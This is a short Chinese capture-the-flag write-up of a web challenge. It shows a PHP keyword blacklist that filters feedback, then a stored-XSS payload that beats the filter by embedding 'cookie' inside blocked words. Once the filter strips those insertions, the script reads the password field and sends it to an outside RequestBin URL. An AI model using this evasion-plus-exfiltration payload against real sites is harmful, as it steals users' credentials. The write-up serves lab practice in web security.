進入靶場

? ?

修改了url后才到了注冊頁面

注測后再登錄

查看源碼

都點進去看看

?有個反饋頁面

再查看源碼

?又有收獲

// 檢查$feedback是否為數組
if (is_array($feedback)) {// 如果是數組，彈出提示框提示反饋不合法echo "<script>alert('反饋不合法');</script>";// 返回false，表示反饋不符合要求return false;
}
// 定義一個黑名單數組，包含一些不允許在反饋中出現的關鍵字和特殊字符
$blacklist = ['_', '\'', '&', '\\', '#', '%', 'input','script', 'iframe', 'host', 'onload', 'onerror','srcdoc', 'location','svg', 'form', 'img','src', 'getElement', 'document', 'cookie'];
// 遍歷黑名單數組
foreach ($blacklist as $val) {// 進入循環，不斷檢查和替換while (true) {// 不區分大小寫地檢查$feedback中是否包含當前黑名單中的值if (stripos($feedback, $val)!== false) {// 如果包含，不區分大小寫地將其從$feedback中替換為空字符串$feedback = str_ireplace($val, "", $feedback);} else {// 如果不包含，跳出當前循環break;}}
}

用到下面網站

RequestBin — Collect, inspect and debug HTTP requests and webhooks

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
? ? var psw = docucookiement.getcookieElementsByName("password")[0].value;
? ? docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1a5ujib1/?a="+psw;
</scrcookieipt>

?最后在網站上可以得到flag